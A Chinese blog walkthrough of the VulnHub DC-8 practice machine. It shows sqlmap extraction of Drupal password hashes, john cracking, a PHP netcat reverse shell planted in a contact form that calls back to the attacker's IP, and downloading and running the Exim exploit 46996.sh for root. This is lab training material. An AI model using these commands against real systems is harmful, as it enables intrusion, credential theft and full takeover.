靶场练习第十六天~vulnhub靶场之dc-8

最新推荐文章于 2022-09-26 14:05:28 发布
最新推荐文章于 2022-09-26 14:05:28 发布
阅读量345 收藏 1
点赞数
分类专栏: # 靶机练习 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122907216
版权

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:https://download.vulnhub.com/dc/DC-8.zip

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A -p- 192.168.101.121

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

 

三、漏洞发现及其利用

(1)sql注入

1.使用sqlmap

sqlmap -u http://192.168.101.121?nid=1 -current-db -batch #获取当前数据库

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -tables -batch # 获取表名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -columns -batch #获取字段名

sqlmap -u http://192.168.101.121/?nid=1 -D d7db -T users -C name,pass -dump #获取账号密码

获取当前数据库

获取表名user

获取字段名name、pass

获取账号密码

2.john解码

创建一个文本将刚才获取到的密码放到里面,通过john解码

vi pass

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

:wq

cat pass

john pass

只得出一个turtle密码,不知道是admin还是john,都试一下

最后只能是john

登录成功

(2)反弹getshell

1.添加getshell

发现观察页面,发现Concat Us可以修改内容,到web写一个php反弹shell

点击form settins进行编写getshell的语句

dsasffafgssgss

<?php

system('nc -e /bin/bash 192.168.101.10 1234');

?>

页面最后面有一个save configuration,点击它保存


2.反弹shell

(1)在kali这边开启监听

nc -lvvp 1234

(2)回到刚才登录到页面,随便提交点东西

(3)回到kali,发现已经监听成功

(4)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)

python -c 'import pty;pty.spawn("/bin/bash")'

(3)提权

1.查找具有suid权限的命令,发现可疑命令exim4,百度一下,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限

find / -user root -perm -4000 -print 2>/dev/null

2.查看exim版本

/usr/sbin/exim4 --version

3.使用searchsploit工具查找exim版本脚本信息

searchsploit exim

4.将攻击代码下载到当前目录并使用dos2unix修改格式为unix,避免后面需要在脚本中再操作,或者在靶机上修改脚本内容(在文件内容终端输入:set ff=unix,使windows代码能在Unix上执行)

apt install dos2unix

cd /home

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home

dos2unix 46996.sh

5.在kali开启一个Http服务

python -m SimpleHTTPServer

6.在靶机上将46996.sh脚本文件下载在靶机本地并提升权限

cd /tmp

wget http://192.168.101.10:8000/46996.sh

chmod 777 46996.sh

7.启动脚本进行提权

./46996.sh -m netcat

8.找到flag

cat /root/flag.txt

汉南帝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-8靶场
qq_49518993的博客
08-27 852
DC-8靶场
DC8_靶场训练
JSH_CDX的博客
03-31 983
本篇文章是对DC靶场的实战,也是通关过程,希望这对你会有帮助
DC-8 靶场夺旗
猎荒者
03-02 621
当你凝视深远的时候,深渊也凝视着你 环境准备 Kali(IP:10.10.16.128) DC-8 虚拟机 NAT 网络连接 主机发现 nmap -sP 10.10.16.0/24 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.145 目录爆破 dirb http://10.10.16.145 发现一个 robots.txt 文件 访问 rob...
DC-8靶场渗透】
一纸荒芜的博客
08-13 1987
dc-8靶场
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3147
dc-8靶场详细渗透过程
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1078
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
Vulhub-DC-8靶场实战攻略
weixin_51339377的博客
03-17 940
测试网页中的Details 发现可以通过Get传参数 加上单引号以后出现报错 说明存在SQL注入的漏洞 通过sqlmap进行尝试 sqlmap -uhttp://192.168.206.142/?nid=1 -D d7db --tables sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns sqlmap -u http://192.168.206.142...
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2959
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 1897
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 1859
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4638
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
靶机渗透 -- DC-8
qq_42785117的博客
09-28 2132
dc-8靶机下载地址:点这里 环境: kali ip: 192.168.157.124 靶机ip:192.168.157.143 渗透阶段 首先寻找靶机IP,以及扫描靶机的端口信息 使用cmsmap扫描,确定CMS名称以及版本 浏览网站,发现疑似注入点 使用sqlmap爆库得到数据 在user表中查询到账户密码 使用john工具进行破解,得到登录密码(这里用户名叫做john也是一种提示...
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1757
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
vulnhub靶场 planets
08-28
- *3* [靶场练习第二~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值